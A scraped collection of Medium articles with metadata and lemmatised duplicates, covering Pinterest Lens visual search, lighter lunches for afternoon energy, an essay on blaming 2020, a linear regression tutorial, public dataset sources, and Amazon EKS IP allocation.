from multiple sources, some of which are only semantically relevant to the input image. By giving Pinners results beyond visually similar, Lens is a new type of visual discovery tool that bridges real world camera images to the Pinterest taste graph. Building object search Sometimes you see something you love, like a cool clock or a pair of sneakers, but you don’t know how to style the shoe or how the clock would look in a room. Object Search, a core component of Lens, is a new technology we built to address these problems. With the advances of deep learning resulting in technology such as improved image representations and object detection, we can now understand images like never before. Traditionally, visual search systems have treated whole images as the unit. These systems index global image representations to return images similar holistically to the given input image. With better image representations as a result of advancements in deep learning, visual search systems have reached an unprecedented level of accuracy. However, we wanted to push the bounds of visual search technology to go beyond the whole image as the unit. By utilizing our corpus of billions of objects, combined with our real-time object detector, we can understand images on a more fine grained level. Now, for the first time, we know both the location and the semantic meaning of billions of objects in our image corpus. Object search is a visual search system that treats objects as the unit. Given an input image, we find the most visually similar objects in billions of images in a fraction of a second, map those objects to the original image and return scenes containing the similar objects. Future of visual discovery The BETA launch of Lens is really just the beginning. We’re continuing to improve our visual technologies to better understand images, as we face challenges where the image is the only available signal that we have to understand user intent. This is especially difficult in the case of real world camera images as people take photos in a variety of lighting conditions with inconsistent image quality and various orientations. We’re excited by the possibilities that objects and visual search together can bring and are continuing to explore new ways of utilizing our massive scale of objects and images to build discovery products for Pinners around the world. If you’re interested in tackling these computer vision challenges and building awesome products for Pinners, please join us! Acknowledgements: Lens is a collaborative effort at Pinterest. We’d like to thank Maesen Churchill, Jeff Donahue, Shirley Du, Jamie Favazza, Michael Feng, Naveen Gavini, Jack Hsu, Yiming Jen, Jason Jia, Eric Kim, Dmitry Kislyuk, Vishwa Patel, Albert Pereta, Steven Ramkumar, Eric Sung, Eric Tzeng, Kelei Xu, Mao Ye, Zhefei Yu, Cindy Zhang, and Zhiyuan Zhang for the collaboration on the product launch, Trevor Darrell for his advisement, Yushi (Kevin) Jing, Vanja Josifovski and Evan Sharp for their support.
https://medium.com/pinterest-engineering/building-pinterest-lens-a-real-world-visual-discovery-system-59812d8cbfbc
['Pinterest Engineering']
2017-02-22 18:35:32.806000+00:00
['Deep Learning', 'Machine Learning', 'Visual Search', 'Computer Vision', 'Engineering']
Title Building Pinterest Lens real world visual discovery systemContent Andrew Zhai Pinterest tech lead Visual Search Recently announced Lens BETA new way discover object idea world around using phone’s camera tap Lens icon Pinterest app point anything Lens return visually similar object related idea object completed project context Lens enables go beyond traditional us phone’s camera–taking selfies saving scene–and turn powerful discovery system brings magic Pinterest real world anything see lead related idea Pinterest we’ll share built Lens main technical challenge overcame Background 2015 launched first visual search experience enables people pinpoint part image get visually similar result visual search gained platform advance technology incrementally improve system optimizing relevant result engaging one Pinners responded positively improvement generate 250 million unique visual search every month next evolution visual search introduced realtime object detection made visual search easier use also steadily gained corpus object people saved selected Since launch we’ve generated billion object six month’s time used data build new technology Lens object search you’re interested indepth look scaled visual search technology billion image applied across Pinterest please take look Visual Discovery Pinterest paper accepted publication World Wide Web WWW conference year Lens architecture single Pin take rabbit hole related idea enabling discover high quality content 150M people around world developed Lens wanted parallel experience single real world camera image could connect 100B idea Pinterest Lens combine understanding image object discovery technology offer Pinners diverse set result example take picture blueberry Lens doesn’t return blueberry also give result recipe blueberry scone smoothy beauty idea like detox scrub tip growing blueberry bush Lens’ overall architecture separated two logical component first component query understanding layer derive information regarding given input image compute visual feature detecting object computing salient color detecting lighting image quality condition Using visual feature also compute semantic feature annotation category second component blender result Lens return come multiple source use visual search technology return visually similar result object search technology return scene project visually similar object image search us derived annotation return personalized text search result semantically visually relevant input image It’s job blender dynamically change blending ratio result source based information derived query understanding layer instance image search won’t triggered annotation low confidence object search won’t triggered relevant object detected shown Lens result aren’t strictly visually similar come multiple source semantically relevant input image giving Pinners result beyond visually similar Lens new type visual discovery tool bridge real world camera image Pinterest taste graph Building object search Sometimes see something love like cool clock pair sneaker don’t know style shoe clock would look room Object Search core component Lens new technology built address problem advance deep learning resulting technology improved image representation object detection understand image like never Traditionally visual search system treated whole image unit system index global image representation return image similar holistically given input image better image representation result advancement deep learning visual search system reached unprecedented level accuracy However wanted push bound visual search technology go beyond whole image unit utilizing corpus billion object combined realtime object detector understand image fine grained level first time know location semantic meaning billion object image corpus Object search visual search system treat object unit Given input image find visually similar object billion image fraction second map object original image return scene containing similar object Future visual discovery BETA launch Lens really beginning We’re continuing improve visual technology better understand image face challenge image available signal understand user intent especially difficult case real world camera image people take photo variety lighting condition inconsistent image quality various orientation We’re excited possibility object visual search together bring continuing explore new way utilizing massive scale object image build discovery product Pinners around world you’re interested tackling computer vision challenge building awesome product Pinners please join u Acknowledgements Lens collaborative effort Pinterest We’d like thank Maesen Churchill Jeff Donahue Shirley Du Jamie Favazza Michael Feng Naveen Gavini Jack Hsu Yiming Jen Jason Jia Eric Kim Dmitry Kislyuk Vishwa Patel Albert Pereta Steven Ramkumar Eric Sung Eric Tzeng Kelei Xu Mao Ye Zhefei Yu Cindy Zhang Zhiyuan Zhang collaboration product launch Trevor Darrell advisement Yushi Kevin Jing Vanja Josifovski Evan Sharp supportTags Deep Learning Machine Learning Visual Search Computer Vision Engineering
3,840
How To Hack Your Lunch
Like most people I know, lunch is my favourite meal of the day. It’s usually our first big meal of the day, and one that we’re always looking forward to, especially after an energy-draining first half of the day. Naturally I gravitated towards heavy lunches. The things in my lunch menu included creamy spaghetti, double cheeseburgers, and the occasional pad thai on the more adventurous days. I liked to keep my lunch meals variegated, but one thing struck a common thread. No matter what I had for lunch, I’d always feel lethargic and drowsy afterwards. For me, this lead to a downward spiral in post-lunch productivity, which was quite annoying. Fortunately for me, I came across an article by the New York Times not so long ago that demystified this vexing phenomenon. For one, it is a natural human tendency to feel sleepy around lunch hours. Our Circadian rhythm is engineered to undergo a dip about 7 hours into waking up. This particular process is embedded within the deep recesses of our primitive brain and is therefore very difficult to suppress. One way to mitigate this problem is by maintaining a good sleep-wake schedule and to get adequate rest during the night. The second reason heavy lunches make people feel drowsy goes down to our body’s physiological processes following meals. After a particularly heavy meal, our blood flow diverts from the brain and into the gut as our body’s parasympathetic nervous system kicks into ‘rest and digest’ mode. This diversion in blood flow is responsible for making us feel a downslope in alertness, productive output and a blunted creative tendency. This same process, in reverse, causes blood to divert from the gut and into the muscles and brain when one is exposed to a threatening stimulus, which triggers the ‘fight or flight’ response. This is carried out by the sympathetic nervous system. Your muscles go into full alert mode, putting whatever process is currently undertaking in your digestive tract on hold. The entire process is regulated by the autonomic nervous system in the brain and spinal cord, and is particularly useful when it comes to prioritising tasks in your body. Because it’s practically impossible for parasympathetic and sympathetic activities to occur simultaneously, this system acts like a sorting machine to ensure the right task is performed during the right circumstances. Unlike the fully autopilot nature of our Circadian rhythm, we at least get to control what enters our digestive system. By the mere virtue of quantity, a heavier meal will cause an increased parasympathetic response, and hence worsen an already present propensity to slump on your chair during the afternoon hours. A lighter meal, in contrast, lessens our digestive burden and therefore dampens the effects of parasympathetic overload. In return, they have the potential to improve post-prandial productivity and reduce daytime sleepiness. I experienced the benefits that lighter meals proffered first hand and found that switching my lunch regimen to a simpler, calorie-lighter diet made me less drowsy in the afternoon, and vastly improved my post-lunch energy levels. Nowadays, I opt for a small pasta with some grilled chicken shreds or a simple green pea-and-chicken salad and a glass of water. I no longer need my ration of coffee in the afternoon to keep me awake and perform my tasks. The additional boost of energy also created for me the illusion of adding more hours to the day, as it meant I was more active on more hours than I was used to having. These days, I’m an evangelist for light lunch regimens. Besides the occasional burgers and burritos that I dig into during my photoshoot days, I consistently stick to modest lunch portions while ensuring my macronutrient balance is still kept on check. If you’re a fan of heavy lunches like I was, and feel the subsequent lethargy take a huge toll on your afternoons, you should definitely try switching to this routine and see the changes it brings to your office table. This last piece may be a bit of a long-shot, but if you really capitalise on your enhanced productivity, perhaps you’ll impress your employers and see yourself bringing home an additional wad of cash every month. Now that’s a true hack.
https://jonathanoei.medium.com/how-to-hack-your-lunch-8ea89e588ef9
['Jonathan Adrian']
2020-02-04 03:25:13.559000+00:00
['Self Improvement', 'Business', 'Health', 'Productivity', 'Nutrition']
Title Hack LunchContent Like people know lunch favourite meal day It’s usually first big meal day one we’re always looking forward especially energydraining first half day Naturally gravitated towards heavy lunch thing lunch menu included creamy spaghetti double cheeseburger occasional pad thai adventurous day liked keep lunch meal variegated one thing struck common thread matter lunch I’d always feel lethargic drowsy afterwards lead downward spiral postlunch productivity quite annoying Fortunately came across article New York Times long ago demystified vexing phenomenon one natural human tendency feel sleepy around lunch hour Circadian rhythm engineered undergo dip 7 hour waking particular process embedded within deep recess primitive brain therefore difficult suppress One way mitigate problem maintaining good sleepwake schedule get adequate rest night second reason heavy lunch make people feel drowsy go body’s physiological process following meal particularly heavy meal blood flow diverts brain gut body’s parasympathetic nervous system kick ‘rest digest’ mode diversion blood flow responsible making u feel downslope alertness productive output blunted creative tendency process reverse cause blood divert gut muscle brain one exposed threatening stimulus trigger ‘fight flight’ response carried sympathetic nervous system muscle go full alert mode putting whatever process currently undertaking digestive tract hold entire process regulated autonomic nervous system brain spinal cord particularly useful come prioritising task body it’s practically impossible parasympathetic sympathetic activity occur simultaneously system act like sorting machine ensure right task performed right circumstance Unlike fully autopilot nature Circadian rhythm least get control enters digestive system mere virtue quantity heavier meal cause increased parasympathetic response hence worsen already present propensity slump chair afternoon hour lighter meal contrast lessens digestive burden therefore dampens effect parasympathetic overload return potential improve postprandial productivity reduce daytime sleepiness experienced benefit lighter meal proffered first hand found switching lunch regimen simpler calorielighter diet made le drowsy afternoon vastly improved postlunch energy level Nowadays opt small pasta grilled chicken shred simple green peaandchicken salad glass water longer need ration coffee afternoon keep awake perform task additional boost energy also created illusion adding hour day meant active hour used day I’m evangelist light lunch regimen Besides occasional burger burrito dig photoshoot day consistently stick modest lunch portion ensuring macronutrient balance still kept check you’re fan heavy lunch like feel subsequent lethargy take huge toll afternoon definitely try switching routine see change brings office table last piece may bit longshot really capitalise enhanced productivity perhaps you’ll impress employer see bringing home additional wad cash every month that’s true hackTags Self Improvement Business Health Productivity Nutrition
3,841
2020 Isn’t the Problem
When the news broke that Supreme Court Justice Ruth Bader Ginsburg had died, the instant outpouring of grief on social media was immediately followed by an outpouring of condemnation. Of a single 12-month period of time. It all amounted to: “2020 is the Worst. Year. Ever.” This year has been a steady stream of devastating wildfires, political disasters, mass whale beachings, near brushes with World War III, a global pandemic, police brutality, and a growing awareness on the part of White Americans that we didn’t actually fix racism by watching Get Out and reading half of Between the World and Me. And although no one is actually blaming 2020 for what’s happening in 2020, we are using it as a scapegoat. Declaring 2020 the worst year ever is a form of collective commiseration that gives a name to a difficult experience and makes us feel less alone. It’s a coping mechanism. But for many of us, it’s becoming less effective and more dangerous all the time. Blaming the year has become a convenient container into which we can stash every difficult truth and terrible event. It’s a way to distance ourselves from the moment. We’re choosing to believe that everything that is difficult will pass when the calendar changes. It won’t, obviously. At 12:01 a.m. on January 1, 2021 people will still be living in poverty. Racism will still threaten the lives and livelihoods of Black Americans. Our health care system will still be inadequate, and climate change will still be coming for us. All of these things will continue to be propped up by choices we make on a daily basis, and by the choices of the people we elect. The year is not the problem. We are. Which means we can do something about it. What the real problem is Every time you catch yourself falling into the 2020 trap, take a moment to look inside the container. What’s your reaction to learning that in normal times, 35 million Americans experience food insecurity, a number that has risen dramatically this year? That the wildfires in California and Oregon have released at least 83 million metric tons of carbon into the atmosphere? That Black Americans are two to three times more likely to die from Covid than White Americans? To the news that the police officers who shot and killed Breonna Taylor in her own bed will not be charged with a crime? For each of these problems, ask: Collectively, what story are we telling ourselves about it? Why the hell did this happen? What can we learn about it? What can you do about it? Turn the tic of rolling your eyes and saying “cuz 2020” into a mission to more fully understand the world. What many of us are experiencing more deeply than usual right now is instability. We’re used to making plans and having them mostly work out. We research preschools and make elaborate grocery shopping lists for project cooking. Now we’re left scrambling to figure out how the hell we’re going to take care of our children and keep our jobs, or stay healthy and not go insane from isolation, or when we can see our families who live a plane ride away. The fact that these things are unusual for us is an opportunity for reflection. For a huge, often unacknowledged, portion of the world, this volatility is normal In 2018, glaciologists from the University of Maine concluded that in the year 536 A.D. an Icelandic volcano erupted, plunging most of the Western and Northern Hemispheres into a foggy near-darkness for at least 18 months. Crops failed, people starved, more eruptions followed, and the Plague of Justinian wiped out something like a third of the Holy Roman Empire. Life was extremely unpleasant for about a century afterward. This revelation inspired a spate of articles ranking the worst years in history—with hot takes from historians on horrible times to be alive. While 536 has a clear edge, other generally very Eurocentric nominations include 1348, at the height of the plague in Europe, and 1492, when Christopher Columbus landed in the New World and laid the groundwork for the genocide of indigenous people and the trans-Atlantic slave trade. Years during the American Civil War and WWII were also mentioned, and as well as 1918, the beginning of the Spanish Flu pandemic that killed more than 50 million people worldwide, an almost inconceivable loss of life. Contagion. War. Natural disasters. None of these are conducive to a high quality of life. Only a masochist would actively choose to live through such events. The pandemic, though, had been like a black light shining on the hotel bedspread of modern life — we now cannot deny what we previously low-level suspected, and now that we know, we’re sure having trouble sleeping soundly. But we’re not truly that surprised. The instinct to blame it all on 2020 can be harnessed Everyone alive today is descended from humans who survived some serious shit. Some of us have clearly fared better than others — we’re still grappling with the legacy of that, and in some ways, we’re just starting. But we also have more and different tools now than in 536 or 1943 or 1968. The same technology that allows you to read a profanity-riddled pep talk from a stranger on your pocket computer when you should probably be sleeping or talking to an actual human makes it possible to connect to people around the world, research almost anything, coordinate a protest, start a letter-writing campaign — connect. When Ginsburg started law school in 1956, just over a generation of women had had the right to vote. She could make the Harvard Law Review but she couldn’t have her own credit card or mortgage. That didn’t change by saying #1956istheworst. It changed one decision, one argument, one job title at a time. No matter who wins the election, no matter if a safe and effective vaccine becomes available next week, we have a challenging road ahead. The clarity we’ve gained, the rapid change we’ve adapted to though, the realization that our individual and collective decisions matter — all of it means that we do have the power to make 2025 or 2040 the best year ever, for the most people ever.
https://forge.medium.com/2020-isnt-the-problem-f5464024b5fc
['Annaliese Griffin']
2020-09-25 05:32:57.443000+00:00
['Grief', '2020', 'Culture', 'Society', 'Future']
Title 2020 Isn’t ProblemContent news broke Supreme Court Justice Ruth Bader Ginsburg died instant outpouring grief social medium immediately followed outpouring condemnation single 12month period time amounted “2020 Worst Year Ever” year steady stream devastating wildfire political disaster mass whale beachings near brush World War III global pandemic police brutality growing awareness part White Americans didn’t actually fix racism watching Get reading half World although one actually blaming 2020 what’s happening 2020 using scapegoat Declaring 2020 worst year ever form collective commiseration give name difficult experience make u feel le alone It’s coping mechanism many u it’s becoming le effective dangerous time Blaming year become convenient container stash every difficult truth terrible event It’s way distance moment We’re choosing believe everything difficult pas calendar change won’t obviously 1201 January 1 2021 people still living poverty Racism still threaten life livelihood Black Americans health care system still inadequate climate change still coming u thing continue propped choice make daily basis choice people elect year problem mean something real problem Every time catch falling 2020 trap take moment look inside container What’s reaction learning normal time 35 million Americans experience food insecurity number risen dramatically year wildfire California Oregon released least 83 million metric ton carbon atmosphere Black Americans two three time likely die Covid White Americans news police officer shot killed Breonna Taylor bed charged crime problem ask Collectively story telling hell happen learn Turn tic rolling eye saying “cuz 2020” mission fully understand world many u experiencing deeply usual right instability We’re used making plan mostly work research preschool make elaborate grocery shopping list project cooking we’re left scrambling figure hell we’re going take care child keep job stay healthy go insane isolation see family live plane ride away fact thing unusual u opportunity reflection huge often unacknowledged portion world volatility normal 2018 glaciologists University Maine concluded year 536 AD Icelandic volcano erupted plunging Western Northern Hemispheres foggy neardarkness least 18 month Crops failed people starved eruption followed Plague Justinian wiped something like third Holy Roman Empire Life extremely unpleasant century afterward revelation inspired spate article ranking worst year history—with hot take historian horrible time alive 536 clear edge generally Eurocentric nomination include 1348 height plague Europe 1492 Christopher Columbus landed New World laid groundwork genocide indigenous people transAtlantic slave trade Years American Civil War WWII also mentioned well 1918 beginning Spanish Flu pandemic killed 50 million people worldwide almost inconceivable loss life Contagion War Natural disaster None conducive high quality life masochist would actively choose live event pandemic though like black light shining hotel bedspread modern life — cannot deny previously lowlevel suspected know we’re sure trouble sleeping soundly we’re truly surprised instinct blame 2020 harnessed Everyone alive today descended human survived serious shit u clearly fared better others — we’re still grappling legacy way we’re starting also different tool 536 1943 1968 technology allows read profanityriddled pep talk stranger pocket computer probably sleeping talking actual human make possible connect people around world research almost anything coordinate protest start letterwriting campaign — connect Ginsburg started law school 1956 generation woman right vote could make Harvard Law Review couldn’t credit card mortgage didn’t change saying 1956istheworst changed one decision one argument one job title time matter win election matter safe effective vaccine becomes available next week challenging road ahead clarity we’ve gained rapid change we’ve adapted though realization individual collective decision matter — mean power make 2025 2040 best year ever people everTags Grief 2020 Culture Society Future
3,842
Linear Regression
Regression analysis is one of the most important fields in statistics and Fig 1 — Regression machine learning. There are several regression methods available. Linear regression is one of them. Regression searches for relationships among variables. In statistical modeling and in Machine learning that relationship is used to forecast the result of further or future event. Linear Regression Linear regression is probably one of the most important and widely used regression techniques. It’s among the simplest regression methods. One of its main advantages is the ease of interpreting results. Linear regression tries to form the relationship between two variables by making a linear equation to observed data. One variable is considered to be an descriptive variable, and the other is considered to be a dependent variable. Fig 2 — Linear Regression relation between x and y Simple Linear Regression: Simple linear regression is the simplest case of linear regression with a single independent variable, 𝐱 = 𝑥. Multiple Linear Regression: Multiple linear regression is a case of linear regression with more than one independent variables. Polynomial Regression: Polynomial regression is a generalized case of linear regression. One assumes the polynomial dependence between the output and inputs and, consequently, the polynomial estimated regression function. Implementing Linear Regression in Python Fig 3 — Linear Regression in Python Python Packages for Linear Regression: The package NumPy is a fundamental Python scientific package that allows many high-performance operations on single- and multi-dimensional arrays. It also offers many mathematical routines. It is open source. The package scikit-learn is a widely used Python library for machine learning, built on top of NumPy and some other packages. It provides the means for preprocessing data, reducing dimensionality, implementing regression, classification, clustering, and more. Like NumPy, scikit-learn is also open source. Simple Linear Regression with scikit-learn : Let’s start with the simplest case, which is simple linear regression. There are five basic steps when you’re implementing linear regression: Import the packages and classes that are needed. Provide the data to work with and then do appropriate changes. Create a regression model and fit it with existing data. Check the results of model fitting to know whether the model is satisfactory or not. Apply the model for predictions. Lets see an example where we predict the speed of a 10 year old car. Import the modules needed. Fig 4 — Importing the needed modules Create the arrays that represent the values of the x and y axis: Fig 5 — values of x and y Execute a method that returns some important key values of Linear Regression: Fig 6 — A method to return key values Create a function that uses the slope and intercept values to return a new value. This new value represents where on the y-axis the corresponding x value will be placed: Fig 7 — Define a Function Run each value of the x array through the function. This will result in a new array with new values for the y-axis: Fig 8 — Run x through the function Draw the original scatter plot: Fig 9 — Scatter Plot Draw the line of linear regression: Fig 10 — Line of linear regression Display the diagram: plt.show() Fig 11 — Screenshot of the code with output. Conclusion: Linear Regression is easy to implement and easier to interpret the output coefficients.When you are aware that the relationship between the independent and dependent variable have a linear relationship, this algorithm is the best to use due of it’s less complexity compared to other algorithms.Linear Regression is a great tool to analyze the relationships among the variables but it isn’t recommended for most practical applications because it over-simplifies real-world problems by assuming a linear relationship among the variables.
https://medium.com/analytics-vidhya/linear-regression-4a8054576241
['Sruti Samatkar']
2020-12-13 16:33:53.560000+00:00
['Machine Learning', 'Matplotlib', 'Python', 'Linear Regression', 'Numpy']
Title Linear RegressionContent Regression analysis one important field statistic Fig 1 — Regression machine learning several regression method available Linear regression one Regression search relationship among variable statistical modeling Machine learning relationship used forecast result future event Linear Regression Linear regression probably one important widely used regression technique It’s among simplest regression method One main advantage ease interpreting result Linear regression try form relationship two variable making linear equation observed data One variable considered descriptive variable considered dependent variable Fig 2 — Linear Regression relation x Simple Linear Regression Simple linear regression simplest case linear regression single independent variable 𝐱 𝑥 Multiple Linear Regression Multiple linear regression case linear regression one independent variable Polynomial Regression Polynomial regression generalized case linear regression One assumes polynomial dependence output input consequently polynomial estimated regression function Implementing Linear Regression Python Fig 3 — Linear Regression Python Python Packages Linear Regression package NumPy fundamental Python scientific package allows many highperformance operation single multidimensional array also offer many mathematical routine open source package scikitlearn widely used Python library machine learning built top NumPy package provides mean preprocessing data reducing dimensionality implementing regression classification clustering Like NumPy scikitlearn also open source Simple Linear Regression scikitlearn Let’s start simplest case simple linear regression five basic step you’re implementing linear regression Import package class needed Provide data work appropriate change Create regression model fit existing data Check result model fitting know whether model satisfactory Apply model prediction Lets see example predict speed 10 year old car Import module needed Fig 4 — Importing needed module Create array represent value x axis Fig 5 — value x Execute method return important key value Linear Regression Fig 6 — method return key value Create function us slope intercept value return new value new value represents yaxis corresponding x value placed Fig 7 — Define Function Run value x array function result new array new value yaxis Fig 8 — Run x function Draw original scatter plot Fig 9 — Scatter Plot Draw line linear regression Fig 10 — Line linear regression Display diagram pltshow Fig 11 — Screenshot code output Conclusion Linear Regression easy implement easier interpret output coefficientsWhen aware relationship independent dependent variable linear relationship algorithm best use due it’s le complexity compared algorithmsLinear Regression great tool analyze relationship among variable isn’t recommended practical application oversimplifies realworld problem assuming linear relationship among variablesTags Machine Learning Matplotlib Python Linear Regression Numpy
3,843
Best Data Sources for Data Scientists
Database is the information you loose when your memory crashes — Dave Barry Introduction According to Wikipedia, a dataset or data set is collection of data. In the open data discipline , the dataset is the unit to measure the information released in a public open data repository. The most common format for datasets we will find online are in the form of csv and spreadsheets where the data is organized in tabular form. In the case of tabular data, a data set corresponds to one or more database tables , where every column of a table represents a particular variable, and each row corresponds to a given record of the data set in question. The data set lists values for each of the variables, such as height and weight of an object, for each member of the data set. Each value is known as a datum. Data sets can also consist of a collection of documents or files. The data present in the dataset can be in the form of images, videos, audio files, numerical data or textual data and are stored in different formats. It is not necessary that there should be only one file , the dataset can be in the form of zip file or folder containing multiple data tables with related data. How the Datasets are created ? The datasets are created in multiple ways. They have been collected through surveys. Some of the data are recorded from human observation. Data can also be scrapped from websites or pulled via API’s. Even data can also be machine generated data. It’s always important to understand that how was this dataset created ? Where does this dataset comes from? It’s always recommended to understand the data we are working from with. Where to find datasets ? Some of the most commonly used datasets sources are listed below and are used by the data scientists :- 1. Kaggle Kaggle, a subsidiary of Google LLC, is an online community of data scientists and machine learning practitioners. It is a place where you can learn, practice and fine tune our data science and analytics skills. There are lot of open , public data and allow users of the platform to share codes so that we can learn best practices within the data space. Link :- https://www.kaggle.com/datasets 2. UCI Machine Learning Repository University of California Irvine hosts 440 data set as a service to the ML community. These data sets are good , cleaned and can be used for the analytics and modelling purpose. Link: http://archive.ics.uci.edu/ml/index.php 3. Google Public datasets Google Cloud Public Datasets facilitate access to high-demand public datasets, making it easy for you to access and uncover new insights in the cloud. By analyzing these datasets hosted in BigQuery and Cloud Storage, you can seamlessly experience the full value of Google Cloud with ease. Google lists all the datasets on a page. On google cloud platform (GCP) , you can query using BigQuery to explore the datasets. We will need to sign up for the GCP account Link: cloud.google.com/bigquery/public-data/ 4. FiveThirtyEight FiveThirtyEight, sometimes rendered as 538, is a website that focuses on opinion poll analysis, politics, economics, and sports blogging. It is an interactive news and sports site that has some exceptional data visualizations. They make lot of data in open for the public view, meaning that we can download and play with the data ourself Link: https://data.fivethirtyeight.com/ 5. Buzzfeed News It makes the data sets, analysis , libraries , tools , and guides used in it’s article available on Github. Check them out to learn from some of the best Link: github.com/BuzzFeedNews 6. data.world data.world’s cloud-native data catalog makes it easy for everyone — not just the “data people” — to get clear, accurate, fast answers to any business question.A data catalog is a metadata management tool that companies use to inventory and organize the data within their systems. Typical benefits include improvements to data discovery, governance, and access. Link:https://data.world/ 7. Socrata Socrata hosts cleaned open source data sources ranging from the government , business, and education data sets. The Socrata Open Data API allows you to programmatically access a wealth of open data resources Link: https://opendata.socrata.com/ 8. Awesome public datasets This Github hosts a library of awesome, public datasets . They are sorted by category and link us straight to the hosting website. Link: github.com/awesomedata/ 9. Quandl Quandl is a marketplace for financial, economic and alternative data delivered in modern formats for today’s analysts, including Python, Excel, Matlab, and R. Some of the datasets are available for free and some can be purchased. Link: https://www.quandl.com/search 10. Data.gov It allows us to download and explore data from US government agencies. Data can range from government budgets to climate data. The data is very well documented so it becomes easy to navigate through the resources. Link: https://www.data.gov/ 11. Academic Torrents It is a site that is geared around sharing the datasets from scientific papers. We can browse the data sets directly from the website and can also download it . Link: http://academictorrents.com/browse.php 12. AWS Public Data sets Amazon has a page that lists all the data sets for us to browse. We need an aws account for this and amazon also gives free access tier for the new accounts. Link: https://aws.amazon.com/datasets Some other repositories Jeremy Singer-Vine Wikipedia Data Sets World Bank Data Sets Reddit — /r/datasets NASA Datasets Twitter Dataset via Twitter API Github Dataset via Github API CERN Open Data Portal Global Health Observatory Data Repository References : — Machine Learning India — 11 websites to find free, interesting datasets: interviewqs.com. — 21 Places to Find Free Datasets for Data Science Projects: www.dataquest.io. Hope you liked this information Thanks , Saurav Anand
https://medium.com/datadriveninvestor/best-data-sources-for-data-scientists-ae742b42b457
['Saurav Anand']
2020-10-26 10:20:30.536000+00:00
['Data Analysis', 'Artificial Intelligence', 'Computer Vision', 'Data Science', 'Machine Learning']
Title Best Data Sources Data ScientistsContent Database information loose memory crash — Dave Barry Introduction According Wikipedia dataset data set collection data open data discipline dataset unit measure information released public open data repository common format datasets find online form csv spreadsheet data organized tabular form case tabular data data set corresponds one database table every column table represents particular variable row corresponds given record data set question data set list value variable height weight object member data set value known datum Data set also consist collection document file data present dataset form image video audio file numerical data textual data stored different format necessary one file dataset form zip file folder containing multiple data table related data Datasets created datasets created multiple way collected survey data recorded human observation Data also scrapped website pulled via API’s Even data also machine generated data It’s always important understand dataset created dataset come It’s always recommended understand data working find datasets commonly used datasets source listed used data scientist 1 Kaggle Kaggle subsidiary Google LLC online community data scientist machine learning practitioner place learn practice fine tune data science analytics skill lot open public data allow user platform share code learn best practice within data space Link httpswwwkagglecomdatasets 2 UCI Machine Learning Repository University California Irvine host 440 data set service ML community data set good cleaned used analytics modelling purpose Link httparchiveicsuciedumlindexphp 3 Google Public datasets Google Cloud Public Datasets facilitate access highdemand public datasets making easy access uncover new insight cloud analyzing datasets hosted BigQuery Cloud Storage seamlessly experience full value Google Cloud ease Google list datasets page google cloud platform GCP query using BigQuery explore datasets need sign GCP account Link cloudgooglecombigquerypublicdata 4 FiveThirtyEight FiveThirtyEight sometimes rendered 538 website focus opinion poll analysis politics economics sport blogging interactive news sport site exceptional data visualization make lot data open public view meaning download play data ourself Link httpsdatafivethirtyeightcom 5 Buzzfeed News make data set analysis library tool guide used it’s article available Github Check learn best Link githubcomBuzzFeedNews 6 dataworld dataworld’s cloudnative data catalog make easy everyone — “data people” — get clear accurate fast answer business questionA data catalog metadata management tool company use inventory organize data within system Typical benefit include improvement data discovery governance access Linkhttpsdataworld 7 Socrata Socrata host cleaned open source data source ranging government business education data set Socrata Open Data API allows programmatically access wealth open data resource Link httpsopendatasocratacom 8 Awesome public datasets Github host library awesome public datasets sorted category link u straight hosting website Link githubcomawesomedata 9 Quandl Quandl marketplace financial economic alternative data delivered modern format today’s analyst including Python Excel Matlab R datasets available free purchased Link httpswwwquandlcomsearch 10 Datagov allows u download explore data US government agency Data range government budget climate data data well documented becomes easy navigate resource Link httpswwwdatagov 11 Academic Torrents site geared around sharing datasets scientific paper browse data set directly website also download Link httpacademictorrentscombrowsephp 12 AWS Public Data set Amazon page list data set u browse need aws account amazon also give free access tier new account Link httpsawsamazoncomdatasets repository Jeremy SingerVine Wikipedia Data Sets World Bank Data Sets Reddit — rdatasets NASA Datasets Twitter Dataset via Twitter API Github Dataset via Github API CERN Open Data Portal Global Health Observatory Data Repository References — Machine Learning India — 11 website find free interesting datasets interviewqscom — 21 Places Find Free Datasets Data Science Projects wwwdataquestio Hope liked information Thanks Saurav AnandTags Data Analysis Artificial Intelligence Computer Vision Data Science Machine Learning
3,844
Amazon EKS Is Eating My IPs!
What Has Happened to the IP Allocation? Interesting! An empty two-node cluster has used up 62 IP addresses. Let’s work out why! Access config Set up our EKS cluster kubeconfig so we can use kubectl to investigate. I already have the AWS CLI configured. aws eks --region eu-west-2 update-kubeconfig --name test What is deployed? The two nodes will take two IPs from the cluster. What is deployed inside the cluster then? kubectl get pods -A There are six pods running. These are DaemonSets and Deployments that are EKS add-ons used to make the cluster function correctly. OK, cool. So, that’s a total of eight IPs we think should be in use. What about the other 54? We don’t have any other workloads in the cluster. There are no Load Balancers eating up space. There are no out-of-cluster resources like EC2, databases, VPC endpoints, etc. What sort of AWS magic is going on here? The answer lies in how EKS manages networking.
https://medium.com/better-programming/amazon-eks-is-eating-my-ips-e18ea057e045
['Nick Gibbon']
2020-07-19 14:23:19.567000+00:00
['Kubernetes', 'DevOps', 'AWS', 'Software Development', 'Programming']
Title Amazon EKS Eating IPsContent Happened IP Allocation Interesting empty twonode cluster used 62 IP address Let’s work Access config Set EKS cluster kubeconfig use kubectl investigate already AWS CLI configured aws eks region euwest2 updatekubeconfig name test deployed two node take two IPs cluster deployed inside cluster kubectl get pod six pod running DaemonSets Deployments EKS addons used make cluster function correctly OK cool that’s total eight IPs think use 54 don’t workload cluster Load Balancers eating space outofcluster resource like EC2 database VPC endpoint etc sort AWS magic going answer lie EKS manages networkingTags Kubernetes DevOps AWS Software Development Programming
3,845
Google Searches Reveal Covid-19 Hot Spots Before Governments Do
